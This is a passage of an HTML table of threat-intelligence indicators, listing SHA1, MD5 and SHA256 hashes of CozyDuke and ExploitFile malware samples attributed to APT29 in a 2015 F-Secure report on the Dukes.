<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">49FB759D133EEAAB3FCC78CEC64418E44ED649AB</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">08709ef0e3d467ce843af4deb77d74d5</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">bc7bcb663477238508ce8ad366cc9a77811c7f5eabaec47175858fe972639f40</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5150174A4D5E5BB0BCCC568E82DBB86406487510</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2ef51f1ca11ce73fa20b54a5886ad1dd</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">89996b66d5a339939b2072d29675ec3ca6d793f42a5d335a8ea7dab8773321ef</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">543783DF44459A3878AD00ECAE47FF077F5EFD7B</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">d5a82520ebf38a0c595367ff0ca89fae</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">70ae2363191e8b20d1773ecc73afc2b9a5dd8247c7b97eecfd1378f3e7aabf92</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6B0721A9CED806076F84E828D9C65504A77D106C</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">57a1f0658712ee7b3a724b6d07e97259</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">bc5625c674f08cca18e73eb661eed0182ef16e27983098cf1c61892ca621d60b</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6E00B86A2480ABC6DBD971C0BF6495D81ED1B629</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">556b9eca4a85f52e2f3176c306e18661</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">12e1139ef422c2c0884fb5b1786a8489c1769a96880a30406e4a28b76ea4a73a</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">78E9960CC5819583FB98FB619B33BFF7768EE861</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">181a88c911b10d0fcb4682ae552c0de3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a5373b33ac970dedeb52528b123959145bf51c95b159a30a7823ad8018ac4b41</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7E9EB570EF07B793828C28CA3F84177E1AB76E14</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ac7a22d1af180c21b0061b8d512586d3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f6d52c5608931cdf66d71502fcf012b6781edde64ba1f956c1868f7e36d8c8d2</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8099A40B9EF478EE50C466EB65FE71B247FCF014</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8670710bc9477431a01a576b6b5c1b2a</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1233cca912fb61873c7388f299a4a1b78054e681941beb31f0a48f8c6d7a182b</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">87668D14910C1E1BB8BBEA0C6363F76E664DCD09</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f58a4369b8176edbde4396dc977c9008</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">30c69d91247f8a72a69e4d7c4bce3eafba40975e5890c23dc4dbe7c9a11afa73</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8B357FF017DF3ED882B278D0DBBDF129235D123D</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3d3363598f87c78826c859077606e514</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8C3ED0BBDC77AEC299C77F666C21659840F5CE23</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">e8510a7ae4919a3fcedad985fbbca352</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">18c0b02776487babbf6219cdaf97cbf2b534e0cf87a527228dda2d4a468a257f</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">93D53BE2C3E7961BC01E0BFA5065A2390305268C</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">90bd910ee161b71c7a37ac642f910059</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ff9edb92ee8125519aa1eea60cab9999bcd4caa87b891882caddc73a2a5ae9cf</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">93EE1C714FAD9CC1BF2CBA19F3DE9D1E83C665E2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f02da961eb7b87b41aee5fd9537022f0</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ac4ffc7a2ba8840a20f6b07aa44328f1802b79ced6a56b3ac7e78fa1178ba65a</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9B56155B82F14000F0EC027F29FF20E6AE5205C2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9ad55b83f2eec0c19873a770b0c86a2f</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7cdb9c2e8b6ca7f0a683a39c0bdadc7a512cff5d8264fdec012c541fd19c0522</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">B65AA8590A1BAC52A85DBD1EA091FC586F6AB00A</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f2b05e6b01be3b6cb14e9068e7a66fc1</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">036c5c0075d67f67fee546321f5b9c4f00d37aa9249ffe1627e71946bad4a3d1</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">BDD2BAE83C3BAB9BA0C199492FE57E70C6425DD3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">416db420e781c709bb71acee0b79282f</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4bcb2a5d99297b30f8ff00e08cf7330d5e2f69fc602bb317bf8e9f703a137a99</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">BF265227F9A8E22EA1C0035AC4D2449CEED43E2B</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1dde02ff744fa4e261168e2008fd613a</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">418a21d49fe5bca8a3e050f039a0e2aa03db6d2de0fb49e3ff9d987f31b22dda</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">BF9D3A45273608CAF90084C1157DE2074322A230</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">43c012086c1ae0a67c38b0926d6cba3f</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3dea35172449f0b9a86dff9af3b4480cc4c37a30e8cb54963ff91c4c1ffe7b0d</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">C3D8A548FA0525E1E55AA592E14303FC6964D28D</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f16dff8ec8702518471f637eb5313ab2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2b160b7eef5ce5fdb83889f96fc40cbbbc7b85450ff2afdf781a8eb5d6a0f541</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">C6472898E9085E563CD56BAEB6B6E21928C5486D</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">98a6484533fa12a9ba6b1bd9df1899dc</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9891b5586cede16aa1e1b87380621f68e8956b991cf7675bbe18d2ec61a7522f</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CCF83CD713E0F078697F9E842A06D624F8B9757E</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">acffb2823fc655637657dcbd25f35af8</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">262dbadca239e5259161130ac9f0f5ef50691fd9dc3e3490b6c0d7b76e7ee34e</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">DEA73F04E52917DC71CC4E9D7592B6317E09A054</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7688be226b946e231e0cd36e6b708d20</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3f0ebe892ab87ea24db172ae96cfc216b591d3967821c9d2581a9e11faccde28</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">E0779AC6E5CC76E91FCA71EFEADE2A5D7F099C80</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">209a4a102a977b698544c99d8236e9ca</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">86056f462d5783604b7f050047db210ecf698e72f3664b27d58265663ff5b324</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">E76DA232EC020D133530FDD52FFCC38B7C1D7662</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">62c4ce93050e48d623569c7dcc4d0278</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f44bead117d2cf34b8e50b81c82fbd1b938b94387cdf84386ace46b1f3b5df1a</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">E78870F3807A89684085D605DCD57A06E7327125</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">75457cc94b1d1dfa3f5d1aedc2edb044</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6eeffe540693418a107db3e7d2d9b72a54b2354aa6886b571272aa41f8cc8e0c</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">E99A03EBE3462D2399F1B819F48384F6714DCBA1</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1a262a7bfecd981d7874633f41ea5de8</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">099524703c250d1d1a16288dbd2f425d6cd0491f608e207a82f239b39bb26b7e</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">EA0CFE60A7B7168C42C0E86E15FEB5B0C9674029</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">eb22b99d44223866e24872d80a4ddefd</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f722677df4fb7eb4ac986a944d4f6630b91ac22b31f8d39ec9bf941376d5d4db</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">EB851ADFADA7B40FC4F6C0AE348694500F878493</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b5553645fe819a93aafe2894da13dae7</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1a7239c006a3adf893bdb5c2300b2964ed8bb454e1b622853e4460707dc63c16</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">F2FFC4E1D5FAEC0B7C03A233524BB78E44F0E50B</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9f65e3b320ec91380ebc28d4fdff4895</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8a5d8d103cb175d7dc41932ef9a890997e25dbe15f94ecd2105835fe49779354</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">F33C980D4B6AAAB1DC401226AB452CE840AD4F40</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7f6bca4f08c63e597bed969f5b729c56</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">65fa52f632e4e83ff83120c7df6b90291025a76d5daeb183e814ec0b3bd2bd4e</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">F7D47C38ECA7EC68AA478C06B1BA983D9BF02E15</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a5d6ad8ad82c266fda96e076335a5080</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7ed2d1aceab5f54df4acca63b5d269842d49521e13bab5e652237667c7eef261</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-09_FSecure_THE DUKES7 years of Russian cyberespionage</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ExploitFile</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ExploitFile</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1E770F2A17664E7D7687C53860B1C0DC0DA7157E</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f81f858335b253d4708fbdfa6ca92ee9</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b219c95fac620b25fdaed082a0bc93644443d236e9173829214d587d17a32a87</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ExploitFile</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">353540C6619F2BBA2351BABAD736599811D3392E</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ab7a66ed3c6de1b7449d6054a8b46d7f</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8cad0a40dd87e5d77e5c939bd7ea838c3549c44b525e2f4a1227d53c4af925be</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ExploitFile</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">412D488E88DEEF81225D15959F48479FC8D387B3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">335160cad23e28d4597c1546458042c4</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">afbd1f13132c2f047861b2ea90c18d546a326dbfca4dfeffd8b4ebf852204275</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ExploitFile</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5295B09592D5A651CA3F748F0E6401BD48FE7BDA</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6571a2d3892ca937697e96f8bb795e42</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8c6c57f7e9c81fcf194d17a752f8da4295fab5dad8eb79bd289256b9cdb7415e</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ExploitFile</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">65681390D203871E9C21C68075DBF38944E782E8</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6542cd548182d6adc08a63c942f9bc54</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">880ae80fdc874002a6d9c807802794d4a35c384551d73bb36277b2f1e63d67e2</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ExploitFile</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">74BC93107B1BBAE2D98FCA6D819C2F0BBE8C9F8A</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">fc0e380447be2bbdf9f06fc3358f8648</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b3236d1d0924cd9a17babd13209fe6706fd3a9228f22fe658eb4eb0c71360b73</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ExploitFile</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8949C1D82DDA5C2EAD0A73B532C4B2E1FBB58A0E</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">23d2592db15c251382706515cf4fd37e</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7e9c0bda27bbc80d947bc0c6ce29a19c824288d2b481f92a1637b7b8dfc8b81c</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ExploitFile</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">C671786ABD87D214A28D136B6BAFD4E33EE66951</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2aa2a6e004159b9e3a590c63a0cc47b3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ba35aa14ccc0e4fa8e47b621ea1d1efe1b012b623afd469e56015c0857fec646</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ExploitFile</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">F1F1ACE3906080CEF52CA4948185B665D1D7B13E</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">84137c8e7509a0e9cf7ff71ba060cdb5</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">e745fc57f816b2b507406ce1c0ec47f8f84d8f5efeaf327c657723c897522c83</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-09_FSecure_THE DUKES7 years of Russian cyberespionage</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Geminiduke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
